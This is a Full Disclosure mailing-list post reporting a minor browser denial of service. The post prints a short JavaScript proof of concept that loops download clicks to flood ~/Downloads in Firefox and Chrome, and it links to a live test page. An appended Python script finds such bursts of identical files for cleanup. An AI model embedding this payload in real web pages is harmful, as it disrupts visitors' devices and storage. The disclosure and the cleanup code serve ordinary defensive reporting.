Message-ID: <CAGUWgD83fc=PS=uV9-O9x1_jcNb2G1BZG426_=6xNED03dURNg@mail.gmail.com>
Date: Thu, 18 Jan 2024 12:15:00 +0200
From: Georgi Guninski <gguninski@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Minor firefox DoS - semi silently polluting ~/Downloads with
 files (part 2)

Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)

Tested on: firefox 121 and chrome 120 on GNU/linux

Date: Thu Jan 18 08:38:28 AM UTC 2024

This is barely a DoS, but since it might affect Chrome too we decided
to disclose it.

If a firefox user visits a specially crafted page, then firefox
may create many files in `~/Downloads`.
The user is notified about this in a small dialog, but there is
no option to stop the downloads.
The potential denial of service is that the user must manually
delete the created files and this might be a PITA, especially on
a phone.

The code basically is:
<pre>
URL = "data:text/plain;,a";//can be very large with no net traffic
link = document.createElement('a');
link.href = URL;
link.download = 'joro_';
document.body.appendChild(link);
function f() {
if( !confirm("This will ruin your device with probability up to 199.99%"))
    return;
setInterval("link.click();",1);//dobro
}
f();
</pre>
There is no network traffic and in about 90 seconds firefox 121 created
3434 files at a speed of about 38 files/second.

google chrome 120 prompts about multiple downloads, and if the user
allows it, it creates files at speed of 4.2 files/second, but
it gives modal prompts, which we couldn't close from the GUI and
had to kill the process.

[Test online][1]: if you are vulnerable

[1]: https://j.ludost.net/download2.html

-- 
guninski
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
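
For triage after an incident like the one reported above, this added example (not part of the original post) finds groups of byte-identical files that appeared in a download directory in a rapid burst, so they can be reviewed and removed together. The function names, the sample file names and the `min_files` / `min_rate` thresholds are assumptions chosen for illustration; it generalizes beyond the specific file name in the post by grouping on content hash and modification time.

```python
import hashlib
import os
import tempfile
from collections import defaultdict


def find_download_floods(directory, min_files=50, min_rate=2.0):
    """Return groups of byte-identical files created in a burst.

    A group is reported when it has at least min_files members and their
    modification times imply at least min_rate files per second.
    Both thresholds are assumptions, not values from the post.
    """
    groups = defaultdict(list)
    with os.scandir(directory) as entries:
        for entry in entries:
            if not entry.is_file(follow_symlinks=False):
                continue  # skip directories and symlinks
            with open(entry.path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            groups[digest].append((entry.stat().st_mtime, entry.path))
    floods = []
    for members in groups.values():
        if len(members) < min_files:
            continue
        members.sort()  # oldest first
        span = max(members[-1][0] - members[0][0], 1.0)  # avoid divide-by-zero
        if len(members) / span >= min_rate:
            floods.append([path for _, path in members])
    return floods


def make_sample_dir(count=120, rate=38.0):
    """Constructed sample: identical files spaced 1/rate s apart, plus one unrelated file."""
    root = tempfile.mkdtemp(prefix="downloads_sample_")
    base = 1_705_566_000.0  # constructed timestamp
    for i in range(count):
        path = os.path.join(root, f"sample_{i}")
        with open(path, "wb") as fh:
            fh.write(b"a")
        os.utime(path, (base + i / rate, base + i / rate))
    with open(os.path.join(root, "report.pdf"), "wb") as fh:
        fh.write(b"unrelated content")
    return root


if __name__ == "__main__":
    for group in find_download_floods(make_sample_dir()):
        print(f"{len(group)} identical files, first: {group[0]}")
```

The function only reports paths; deletion is left to the user after reviewing each group.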
